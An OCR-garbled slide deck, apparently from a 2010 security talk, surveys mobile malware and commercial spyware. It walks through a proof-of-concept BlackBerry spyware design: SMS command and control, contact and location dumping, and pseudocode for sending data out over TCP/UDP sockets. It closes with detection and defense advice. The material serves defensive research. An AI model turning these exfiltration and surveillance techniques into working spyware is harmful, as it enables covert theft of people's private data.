The Monkey Steals the Berries 



Mobile Malware - The State of Mobile Security 
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Presenter Background 

■ Currently 

- Sr. Security Researcher, Veracode, Inc, 

■ Previously 

- Security Consultant - Symantec 

- Security Consultant - @Stake 

- Incident Response and Forensics 
Handler 

■ Wishes He Was 

- Infinitely rich 

- Able to leap tall buildings in a single 
bound 

- Smarter than the average bear 
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■ Detecting Malicious Mobile Applications 

■ Mitigation 
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Background 
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Malicious Mobile Applications 

■ Often includes modifications to 
legitimate programs designed to 
compromise the device or device 
data 

■ Often inserted by those who have 
legitimate access to source code or 
distribution binaries 

■ May be intentional or inadvertent 

■ Not specific to any particular 
programming language 

■ Not specific to any particular mobile 
Operating System 
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Attacker Motivation 
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Attacker Motivation 



Practical method of compromise for many systems 

- Let the users install your backdoor on systems you have no access to 

- Looks like legitimate software so may bypass mobile AV 
Retrieve and manipulate valuable private data 

- Looks like legitimate application traffic so little risk of detection 

For high value targets such as financial services and government it 
becomes cost effective and more reliable 

- High-end attackers will not be content to exploit opportunistic vulnerabilities, 
which might be fixed and therefore unavailable at a critical juncture. They 
may seek to implant vulnerability for later exploitation 

- Think "Aurora" for Mobile Devices 
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Units Sold Market Growth 
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iPhone Applications Sold 




Data Source: Gartner, Inc., a research and advisory firm 
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Back To The Future 
Back Orifice v 2000 




VERACODE 




Malicious Mobile Applications In The Wild 
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FlexiSpy 

■ http://www.flexispy.com 

■ $149 - $350 PER YEAR depending on features 

■ Features 

- Remote Listening 

- C&C Over SMS 

- SMS and Email Logging 

- Call History Logging 

- Location Tracking 

- Call Interception 

- GPS Tracking 

- Symbian, Blackberry, Windows Mobile Supported 
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FlexiSpy Web Site Quotes 



"Download FlexiSPY spyphone software directly onto a mobile 
phone and receive copies of SMS, Call Logs, Emails, Locations and 
listen to conversations within minutes of purchase. " 

"Catch cheating wives or cheating husbands , stop employee 
espionage, protect children, make automatic backups, bug meetings 
rooms etc." 

"F Secure seem to think that its ok for them to interfere with 
legitimate, legal and accountable software. Who appointed them 
judge, jury and executioner anyway, and why wont they answer our 
emails, so we have to ask who is the real malware ? Here is how to 
remove FSecure malware from your device . Please don't believe the 
fsecure fear mongers who simply wish you to buy their products." 
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Mobile Spy 



http://www.mobile-spy.com 

$49.97 PER QUARTER or $99.97 PER YEAR 

Features 

- SMS Logging 

- Call Logging 

- GPS Logging 

- Web URL Logging 

- BlackBerry, iPhone (Jailbroken Only), Android, Windows Mobile or Symbian 
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Mobile Spy Web Site Quotes 



"This high-tech spy software will allow you to see exactly what they 
do while you are away. Are your kids textinq while driving or using 
the phone in all hours of the night? Are your employees sending 
company secrets? Do they erase their phone logs?" 

"Our software is not for use on a phone you do not own or have 
proper permission to monitor from the user or owner. You must 
always follow all applicable laws and regulations in your region." 

"Purchased by more than 30,000 customers in over 150 countries" 
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Etisalat (SS8) 



Cell carrier in United Arab Emirates (UAE) 

Pushed via SMS as "software patch" for Blackberry smartphones 

Upgrade urged to "enhance performance" of Blackberry service 

Blackberry PIN messaging as C&C 

Sets FLAGJHIDDEN bit to true 

Interception of outbound email / SMS only 

Discovered due to flooded listener server cause retries that drained 
batteries of affected devices 

Accidentally released the .jar as well as the .cod (ooopsie?!) 
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Storm8 Phone Number Farming 

■ iMobsters and Vampires Live (and others) 

■ "Storm8 has written the software for all its games in such a way that 
it automatically accesses, collects, and transmits the wireless 
telephone number of each iPhone user who downloads any Storm8 
game," the suit alleges. " ... Storm8, though, has no reason 
whatsoever to access the wireless phone numbers of the iPhones on 
which its games are installed." 

■ "Storm8 says that this code was used in development tests, only 
inadvertently remained in production builds, and removed as soon as 
it was alerted to the issue." 

- These were available via the iTunes App Store! 

■ http://www.boinqboinq.net/2009/11/05/iphone-qame-dev-accu.html 
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Symbian Sexy Space 



Poses as legitimate server ACSServer.exe 

Calls itself 'Sexy Space' 

Steals phone and network information 

Exfiltrates data via hacker owned web site connection 

Can SPAM contact list members 

Basically a "botnet" for mobile phones 

Signing process 

- Anti-virus scan using F-Secure 

■ Approx 43% proactive detection rate (PCWorld) 

- Random selection of inbound manually assessed 

Symbian signed this binary as safe! 

http://news.zdnet.co.Uk/securitv/Q, 1 0000001 89,3968431 3,00.htm 
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Symbian MergoSMS 



The worm spreads as self-signed (untrusted) SIS installers 

Installer contains sub-SIS installers some of them signed by 
Symbian. 

Spreads by sending text messages 

- Contain variable messages in Chinese and a link to a website 

- Going to link results in worm download 

On phone reboot malware runs, downloads worm payload, 
completing infection 

The worm was spread on Chinese file sharing web sites 

Originally spread as games, themes, etc. for Symbian Series60 
3rd & 5th edition phones. 

http://www.f-secure.com/v-descs/troian symbos meroqosms.shtml 
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09Droid - Banking Applications Attack 



Droid app that masquerades as any number of different target banking 
applications 

Target banks included 

- Royal Bank of Canada 

- Chase 

- BB&T 

- SunTrust 

- Over 50 total financial institutions were affected 

May steal and exfiltrate banking credentials 

Approved and downloaded from Google's Android Marketplace! 

http://www.theinquirer.net/inquirer/news/1585716/fraud-hits-android-apps- 
market 

http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewslD=3209953 

http://www.f-secure.com/webloq/archives/00001852.html 
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3D Anti-Terrorist / PDA Poker Art / Codec Pack WM1.0 

■ Games available on legitimate application download sites 

■ Originally written by Chinese company Huike 

■ Repackaged in Russia by unknown authors to include malware 

■ Calls premium rate 800 numbers 

■ Three days idle before first dial 

■ Idles one month between subsequent outbound dialing 

- Distributed via common Windows Mobile shareware sites 



http://www.eweek.com/c/a/Securitv/Malware-Hidden-in-Windows- 
Mobile-Applications-424076/ 
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Mobile Security Mechanisms 
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Does It Really Matter?! 



Only 23% of smartphone owners use the security software 
installed on the devices. 

(Source: Trend Micro Inc. survey of 1,016 U.S. smartphone users, June 2009) 

13% of organizations currently protect from mobile viruses 

(Mobile Security 2009 Survey by Goode Intelligence) 
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Common Mobile Security Mechanisms 



Corporate level security policies 

■ Applied at the corporate IT level 

■ Can't be modified by a lower level security mechanism 

Application level security policies 

■ May be pushed down from corporate policy 

■ Otherwise applied at handset itself 

■ Restricts access to specific resources 

■ Sandboxing 

■ Code Signing 
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Common Mobile Security Mechanisms 



Mobile Anti-Virus 

■ Implemented at the handset itself 

■ Fails due to the same reasons PC antivirus is failing today 

Application market place security screening 

■ Applied by the marketplace owner 

■ Currently opaque and ill defined 

■ Misplaced trust already acquired 
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Code Signing 

■ Subset of Blackberry API considered "controlled" 

■ Use of controlled package, class, or method requires appropriate 
code signature 

■ Blackberry Signature Tool comes with the Blackberry JDE 

■ Acquire signing keys by filling out a web form and paying $20 

- This not is a high barrier to entry 

- 48 hours later you receive signing keys 

■ Install keys into signature tool 
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Code Signing Process 

■ Hash of code sent to RIM for API tracking purposes only 

■ RIM does not get source code 

■ COD file is signed based on required keys 

■ Application ready to be deployed 

■ Easy to acquire anonymous keys 
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Blackberry IT Policies 



Requires connection to Blackberry Enterprise Server (BES) 

Supersedes lower levels of security restrictions 

Can prevent devices from downloading third-party applications over 
wireless 

Prevent installation of specific third-party applications 

Control permissions of third party applications 

- Allow Internal Connections 

- Allow Third-Party Apps to Use Serial Port 

- Allow External Connections 

MOSTLY "Default Allow All" policy for BES and non-BES 
devices 



5)2010 Veracode, Inc. 



VERACODE 



Blackberry Application Policies 



Can be controlled at the BES 

If no BES present, controls are set on the handheld itself 

Can only be MORE restrictive than the IT policy, never less 

Control individual resource access per application 

Control individual connection access per application 

MOSTLY "Default Allow All" policy for BES and non-BES 
devices 
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V4.7.0.148 Default 3 rd Party Application Permissions 
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V5.0.0.328 Default 3 rd Party Application Permissions 
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V5.0.0.328 Trusted 3 rd Party Application Permissions 
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Potential Effects and Behaviors 
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Installation Methods 



Accessing a web site using the mobile browser and choosing to 
download the application over the network (OTA Installation) 

Running the application loader tool on the desktop system and 
choosing to download the application onto the device using a 
physical connection to the computer 

Using enterprise management solutions to push the application to 
the entire user community 



Get it into the global application marketplace and let the user 
choose to install it for you! 
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Logging and Dumping 



Monitor connected / disconnected calls 
^ Monitor PIM added / removed / updated 

Monitor inbound SMS 
y£ Monitor outbound SMS 

Real Time track GPS coordinates 



Dump all contacts 
Y~ Dump current location 

Dump phone logs 
^ Dump email 

Dump microphone capture (security prompted) 
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Exfiltration and C&C Methods 



SMS (No CDMA) 

SMS Datagrams (Supports CDMA) 

Email 

HTTP GET 

HTTP POST 

#TCP Socket 
UDP Socket 
DNS Exfiltration 




Default command and control to inbound SMS 
^ TXSPROTO Bidirectional TCP based command and control 
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Data Dumpers 
Listeners 

Exfiltration Methods 
Command and Control 
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Command and Control Channels 

■ initCandC(int a) 

- Initializes inbound SMS listener if passed a == 1 

- Kills spyware otherwise 

- Listens for commands and acts accordingly 
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Dump Contact Information 

■ API 

- javax.microedition.pim 

- net.rim.blackberry.APl.pdap 

■ Pseudocode 

pim pirn = PlM.getlnstanceO ; 

BlackBerryPlMList contacts = (BlackBerryPlMList) 
pi m . openPIMLi St (PIM . CONTACT_LIST , PIM . READ_ONLY) ; 

Enumeration eContacts = contacts. i terns () ; 

Contact contact = (Contact) eContacts. nextEl ement () ; 

if (contacts. isSupportedFi eld (Contact. email)) { 

if (contact. countvalues (Contact. email) > 0) email = 
contact. getString(Contact. EMAIL, 0) ; 

} 
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Location Listener 



Create the class that implements LocationListener Interface 
Get LocationProvider instance 
Add LocationListener 
API 

- javax.microedition. location. LocationProvider.getlnstance 

- javax.microedition. location. LocationProvider.setLocationListener 
Pseudocode 

11 = new LocListenerO ; 

Ip = LocationProvider. getlnstance(null) ; 

lp.setl_ocationl_istener(ll , 1, 1, 1); 
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TCP/UDP Exfiltration 

■ API 

- javax.microedition.io.StreamConnection 

- javax.microedition.io.DatagramConnection 

■ Pseudocode 

conn = 

(StreamConnecti on)Connector . open ("socket : //"+thi s . i p+" : "+thi s . port+" ; 
deviceside=true";) ; 

out = new OutputStreamWriter(conn.openOutputStreamO) ; 

out.write(msg, 0, length); 

conn = 

(DatagramConnection)Connector. open("udp://"+this. ip+": "+thi s . port+" ; 4444") ; 

Datagram out = conn.newDatagram(buf , buf. length); 

out.setData(buf , 0, buf. length); 

conn.send(out) ; 
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Detecting Malicious Mobile Code 
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Detecting Malicious Mobile Code 

■ Signature Based Detection 

- This is how the current anti-virus world is failing 

- Requires "known" signatures for detection 

- Too reactive - broken 

■ Resource Usage White Listing 

- Require individual configuration and white listing of resources 

- Make it fine grained enough to be effective 

- Balancing act resulting in user complaints about ease of use 

- People just click ok - semi broken 
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Detecting Malicious Mobile Code 

■ Sandbox Based Execution Heuristics 

- Run the application and detect malicious activity 

- Requires execution in a sandbox and is reactive 

- Can't ensure complete execution 

- Also semi broken 
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Mobile Malicious Code Detection 

■ Enumerate Mobile Sensitive Taint Sources 

- Sources of potentially private information 

- This is what the attacker is stealing 

■ Enumeration of Mobile Exfiltration Methods 

- Methods by which data can be transferred off the mobile device 

- How the attacker is sending your data out 



Code Flow Tracing 

- Follow data from taint source to exfiltration sink 

- Annotate the existence of potential exfiltration 

- Confirm against expected exfiltration of program 
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Defense in Depth 



Do all of the above! 

Implement and enforce strong IT policies 

Implement and enforce additional application policies as required 

Implement a best of breed anti-virus solution 

- If only for thoroughness of deployed options 

Utilize static decompilation and analysis of applications considered 
for deployment 
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Demonstration 
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Conclusion 



We are currently trusting the vendor application store provider for the 
majority of our mobile device security 

Minimal methods of real time eradication or detection of spyware 
type activities exists 

When the do exist they are not configured correctly (or at all) 

No easy/automated way to confirm for ourselves what the 
applications are actually doing 

Automate the decompilation and static analysis of applications that 
are required for the ongoing functioning of your business 
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The Monkey Steals the Berries! 

Questions? 
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